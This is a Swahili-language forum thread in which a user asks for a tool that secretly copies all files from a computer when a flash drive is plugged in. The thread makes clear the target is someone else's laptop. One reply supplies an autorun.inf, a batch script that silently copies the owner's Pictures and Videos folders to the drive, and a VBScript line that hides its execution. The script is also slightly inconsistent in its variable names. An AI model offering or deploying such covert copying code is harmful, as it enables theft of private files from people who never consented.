Kiti Chema
JF-Expert Member
- Oct 18, 2017
- 1,797
- 1,976
Wadau hivi inawezekana kupata App ambayo ukiinstall kwenye frashi au external memory ukichomeka frash kwenye computer inacopy kila kilichomo automatic, kama ipo ya kununua au inayopatikana playstore naombeni link
Inawezekana kwa kutumia code
Inacopy kutoka kwenye computer kwenda kwenye frash mkuuInakopy kutoka kwenye flash au computer? Inakopy kwa kudhamiria au kwa kificho?
Yeah,Yaani Kama hamjamuelewa mtoa mada, yaani anataka Kama Kwenye movie vile ananyata anapitia dirishani mpaka Kwenye laptop anachomeka flash yake inaanza kukopi
Code gani hizoInawezekana kwa kutumia code
Kwa kudhamilia au hata kwa kificho bila mtu kugusa mouse au computer mkuuInakopy kutoka kwenye flash au computer? Inakopy kwa kudhamiria au kwa kificho?
Wadau hivi inawezekana kupata App ambayo ukiinstall kwenye frashi au external memory ukichomeka frash kwenye computer inacopy kila kilichomo automatic, kama ipo ya kununua au inayopatikana playstore naombeni link
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
wscript.exe \invisible.vbs file.bat
Uwiiiiii 😹😹😹Niliwahi ingia internet cafe mahali jamaa akaniambia computer zake zote harddrive zimejaa, kuja kuangalia kumbe ni virus anakusanya data za flashdisk zinazowekwa inaingiza kwa pc then inafanya uploading kwa huyo mpuuzi.